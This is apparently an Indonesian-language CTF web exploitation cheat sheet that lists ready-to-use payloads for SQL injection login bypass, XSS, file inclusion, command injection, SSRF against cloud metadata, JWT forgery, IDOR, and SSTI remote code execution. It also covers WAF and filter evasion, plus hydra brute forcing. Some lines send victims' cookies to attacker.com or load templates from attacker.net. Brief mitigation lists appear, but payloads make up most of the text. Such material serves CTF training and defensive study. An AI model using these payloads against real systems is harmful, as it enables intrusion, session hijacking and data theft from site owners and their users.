1. SQL Injection#

SQL Injection adalah salah satu kerentanan paling umum dalam CTF. Attacker dapat memanipulasi query SQL untuk mengakses, memodifikasi, atau menghapus data.

Contoh Payload:

1
' OR '1'='1' --
2
admin' --
3
' UNION SELECT NULL, username, password FROM users --

Cara Mendeteksi:

• Input field yang tidak ter-sanitasi
• Error messages yang menampilkan SQL syntax
• Response time yang berbeda untuk payload yang berbeda (Blind SQLi)

2. Cross-Site Scripting (XSS)#

XSS memungkinkan attacker untuk menjalankan JavaScript berbahaya di browser korban.

Tipe-tipe XSS:

• Reflected XSS: Payload di-reflect langsung dalam response
• Stored XSS: Payload tersimpan di database
• DOM-based XSS: Manipulasi DOM di client-side

Contoh Payload:

1
<script>alert(document.cookie)</script>
2
<img src=x onerror="alert('XSS')">
3
<svg onload="alert(1)">

3. Local File Inclusion (LFI)#

LFI memungkinkan attacker membaca file lokal dari server.

Contoh:

1
?file=../../../../etc/passwd
2
?page=php://filter/convert.base64-encode/resource=index.php
3
?file=/var/log/apache2/access.log

Teknik Advanced:

• PHP wrapper exploitation
• Log poisoning
• Path truncation

4. Remote Code Execution (RCE)#

RCE adalah holy grail dari web exploitation - kemampuan untuk menjalankan kode arbitrary di server.

Common Vectors:

• Command injection via system(), exec(), shell_exec()
• Deserialization vulnerabilities
• Server-Side Template Injection (SSTI)

Contoh Payload:

1
; ls -la
2
| cat /etc/passwd
3
`whoami`

5. Server-Side Request Forgery (SSRF)#

SSRF memungkinkan attacker membuat server melakukan request ke resource internal yang tidak seharusnya dapat diakses.

Target Umum:

1
# Cloud Metadata (AWS)
2
http://169.254.169.254/latest/meta-data/
3

4
# Internal Services
5
http://127.0.0.1:8080/admin
6
http://localhost:6379/  (Redis)
7

8
# File System
9
file:///etc/passwd

Bypass Techniques:

1
# IP Encoding
2
http://2130706433/ (127.0.0.1 in decimal)
3
http://0177.0.0.1/ (octal)
4
http://0x7f.0x0.0x0.0x1/ (hex)
5

6
# URL Parser Issues
7
http://expected-host@evil-host/
8

9
# Protocol Wrapper
10
gopher://127.0.0.1:6379/
11
dict://127.0.0.1:6379/info

Tools:

• SSRFmap: Automated SSRF exploitation
• Gopherus: Generate gopher payloads

6. Authentication & Authorization Bypass#

Authentication dan Authorization adalah dua konsep berbeda yang sering menjadi target dalam CTF. Authentication memverifikasi “siapa Anda”, sedangkan Authorization menentukan “apa yang boleh Anda lakukan”.

A. Authentication Bypass

1. SQL Injection-based Auth Bypass:

Memanipulasi query SQL untuk bypass login:

1
# Original query
2
SELECT * FROM users WHERE username='$user' AND password='$pass'
3

4
# Bypass payloads
5
Username: admin' OR '1'='1' --
6
Password: anything
7

8
Username: admin' --
9
Password: anything
10

11
Username: ' OR 1=1 --
12
Password: anything

2. Weak Password Attacks:

1
# Brute force dengan hydra
2
hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"
3

4
# Dictionary attack dengan Burp Intruder
5
# Common default credentials
6
admin:admin
7
admin:password
8
root:root
9
admin:12345

3. JWT (JSON Web Token) Manipulation:

JWT Structure:

1
[Header].[Payload].[Signature]

Attack Vectors:

a) None Algorithm:

1
{
2
  "alg": "none",
3
  "typ": "JWT"
4
}

Ubah algorithm ke “none” dan hapus signature.

b) Algorithm Confusion (RS256 to HS256):

1
# Server menggunakan RS256 dengan public key
2
# Attacker change ke HS256 dan sign dengan public key
3
import jwt
4
public_key = open('public.pem', 'r').read()
5
token = jwt.encode({"user":"admin"}, public_key, algorithm='HS256')

c) Weak Secret:

1
# Crack JWT secret
2
hashcat -m 16500 jwt.txt wordlist.txt
3
john jwt.txt --wordlist=wordlist.txt --format=HMAC-SHA256

d) JWT Claims Manipulation:

1
{
2
  "user": "admin",     // Change dari "user"
3
  "role": "admin",     // Change dari "user"
4
  "exp": 9999999999    // Extend expiration
5
}

4. Session-based Attacks:

Session Fixation:

1
1. Attacker mendapat session ID: SESSIONID=abc123
2
2. Victim login dengan session ID yang sama
3
3. Attacker menggunakan session ID untuk access akun victim

Session Hijacking:

1
# Via XSS
2
<script>document.location='http://attacker.com/?c='+document.cookie</script>
3

4
# Via network sniffing (if HTTP not HTTPS)

Predictable Session IDs:

1
# Jika session ID sequential atau predictable
2
session_ids = [f"SESS{i}" for i in range(1000, 2000)]
3
# Try each session ID

5. Cookie Manipulation:

1
// Decode base64 cookie
2
atob("dXNlcj1ndWVzdA==")  // Output: user=guest
3

4
// Modify and re-encode
5
btoa("user=admin")  // dXNlcj1hZG1pbg==
6

7
// Tamper with serialized cookies
8
user=O:4:"User":2:{s:4:"name";s:5:"admin";s:4:"role";s:5:"admin";}

B. Authorization Bypass

1. Insecure Direct Object Reference (IDOR):

1
# Normal request
2
GET /api/user/1234/profile
3

4
# IDOR - access other user's profile
5
GET /api/user/1235/profile
6
GET /api/user/1/profile  (admin?)
7

8
# Mass Assignment
9
POST /api/user/1234/update
10
{"email": "new@email.com", "role": "admin"}

2. Path Traversal in Authorization:

1
# Bypass dengan path manipulation
2
/admin/../../user/profile
3
/admin/../user/settings
4
/admin/%2e%2e%2fuser/data

3. HTTP Method Tampering:

1
# POST blocked but PUT/PATCH allowed
2
curl -X PUT http://target.com/admin/delete/user/123
3

4
# GET blocked but HEAD allowed
5
curl -I http://target.com/admin

4. Parameter Pollution:

1
# Application checks first parameter
2
/admin?role=user&role=admin
3

4
# Try array notation
5
/admin?role[]=user&role[]=admin

5. Missing Function Level Access Control:

1
# Access admin functions directly
2
/user/profile  (allowed)
3
/admin/panel  (should check but doesn't)
4
/api/admin/deleteUser?id=123

6. OAuth/SAML Vulnerabilities:

OAuth Misconfigurations:

1
# Open redirect in redirect_uri
2
?redirect_uri=https://attacker.com
3

4
# Token leakage via Referer header
5
# CSRF in OAuth flow

SAML Attacks:

1
<!-- XML Signature Wrapping -->
2
<!-- Comment injection -->
3
<!-- XXE in SAML response -->

Advanced Techniques:

1. Race Conditions:

1
# Multiple simultaneous requests
2
# Bypass rate limiting or one-time token checks
3
import threading
4
def attempt_login():
5
    requests.post('/login', data={'token': 'one-time-token'})
6

7
threads = [threading.Thread(target=attempt_login) for _ in range(10)]
8
[t.start() for t in threads]

2. 2FA Bypass:

1
# Techniques:
2
- Response manipulation (change "success":false to true)
3
- Direct access to post-2FA endpoint
4
- Brute force 2FA code (if no rate limit)
5
- Backup codes enumeration
6
- Remember me functionality abuse

3. Password Reset Vulnerabilities:

1
# Host header injection
2
Host: attacker.com
3

4
# Token leakage via Referer
5
# Predictable tokens
6
# Token doesn't expire
7
# Token reuse

Tools:

• Burp Suite: Intercept dan modify requests
• JWT.io: JWT decoder/encoder
• Postman: API testing
• Hydra/Medusa: Brute force
• AuthMatrix: Burp extension untuk testing authorization

Real-World Examples:

• Facebook OAuth vulnerability
• GitHub JWT bypass
• Instagram password reset flaw
• Uber IDOR vulnerability

Mitigation:

Authentication:

• Implement proper password hashing (bcrypt, argon2)
• Use strong JWT secrets
• Implement rate limiting
• Multi-factor authentication
• Secure session management

Authorization:

• Implement proper access control checks
• Validate user permissions on every request
• Use centralized authorization logic
• Principle of least privilege
• Log and monitor access attempts

7. Server-Side Template Injection (SSTI)#

SSTI adalah kerentanan yang terjadi ketika user input di-embed ke dalam template engine tanpa proper sanitization, memungkinkan attacker untuk inject template directives dan menjalankan arbitrary code di server.

Template Engines yang Rentan:

• Python: Jinja2, Mako, Tornado
• PHP: Twig, Smarty
• JavaScript: Handlebars, Pug, EJS
• Java: Freemarker, Velocity
• Ruby: ERB, Slim

Cara Deteksi:

Test dengan payload sederhana untuk melihat apakah expression di-evaluate:

1
{{7*7}}
2
${7*7}
3
<%= 7*7 %>
4
${{7*7}}
5
#{7*7}
6
*{7*7}

Jika output menunjukkan 49 atau hasil evaluasi lainnya, kemungkinan vulnerable terhadap SSTI.

Payload Umum:

Jinja2 (Python/Flask):

1
# Basic RCE
2
{{config.items()}}
3
{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}
4

5
# Alternative payloads
6
{{''.__class__.__mro__[1].__subclasses__()}}
7
{{request.application.__globals__.__builtins__.__import__('os').popen('cat /etc/passwd').read()}}
8

9
# File read
10
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

Twig (PHP):

1
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
2
{{_self.env.setCache("ftp://attacker.net/")}}{{_self.env.loadTemplate("backdoor")}}

EJS (Node.js):

1
<%- global.process.mainModule.require('child_process').execSync('cat /etc/passwd') %>

Freemarker (Java):

1
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }

Teknik Exploitation:

1. Identifikasi Template Engine

   • Test berbagai payload untuk menentukan engine yang digunakan
   • Lihat error messages untuk clue tentang technology stack

2. Bypass Filters

   1
   # Jika '.' di-block
   2
   {{request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('id')['read']()}}
   3
   
   4
   # Jika '__' di-block
   5
   {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')}}
   6
   
   7
   # Menggunakan encoding
   8
   {{"__cla"+"ss__"}}
   

3. RCE via Built-in Functions

   1
   # Python
   2
   {{lipsum.__globals__['os'].popen('ls').read()}}
   3
   {{cycler.__init__.__globals__.os.popen('id').read()}}
   4
   
   5
   # Access to config
   6
   {{config['SECRET_KEY']}}
   

4. Blind SSTI

   • Gunakan time-based detection
   • Out-of-band interaction (DNS, HTTP)

   1
   {{''.__class__.__mro__[1].__subclasses__()[396]('sleep 5',shell=True,stdout=-1).communicate()}}
   

Tools untuk SSTI:

• tplmap: Automated SSTI detection and exploitation

  1
  tplmap -u 'http://target.com/page?name=test'
  

• SSTImap: Alternative tool untuk SSTI scanning
• Burp Suite Extensions: Backslash Powered Scanner

Real-World Impact:

• Remote Code Execution
• Full server compromise
• Data exfiltration
• Privilege escalation
• Internal network access

Mitigation:

• Selalu sanitize user input
• Gunakan sandboxed template environments
• Implement whitelist untuk allowed characters
• Avoid passing user input directly ke template engine
• Use logic-less templates jika memungkinkan

Reconnaissance#

• Burp Suite: Web proxy untuk intercept dan modify requests
• OWASP ZAP: Alternative open-source untuk Burp
• ffuf/gobuster: Directory fuzzing
• Nmap: Port scanning

Exploitation#

• sqlmap: Automated SQL injection tool
• XSStrike: XSS detection and exploitation
• CyberChef: Encoding/decoding utility
• curl/wget: Manual HTTP requests

Analysis#

• Developer Tools: Browser built-in tools
• Wappalyzer: Technology detection
• nikto: Web server scanner

1. Reconnaissance#

• Inspect source code (HTML, JS, CSS)
• Check robots.txt, sitemap.xml
• Look for comments, debug information
• Identify technology stack

2. Enumeration#

• Directory fuzzing
• Parameter discovery
• Subdomain enumeration
• API endpoint discovery

3. Vulnerability Analysis#

• Test input fields
• Check for common vulnerabilities
• Analyze authentication mechanisms
• Review session management

4. Exploitation#

• Craft payload
• Bypass filters (WAF, input validation)
• Chain multiple vulnerabilities
• Privilege escalation

5. Post-Exploitation#

• Find the flag
• Document findings
• Clean up traces

WAF Bypass#

1
# Case variation
2
<ScRiPt>alert(1)</sCrIpT>
3

4
# Encoding
5
%3Cscript%3Ealert(1)%3C/script%3E
6

7
# Nested tags
8
<scr<script>ipt>alert(1)</scr</script>ipt>

Filter Bypass#

1
# Blacklist bypass
2
cat fl''ag.txt
3
c''at flag.txt
4

5
# Whitespace alternatives
6
cat${IFS}flag.txt
7
cat$IFS$9flag.txt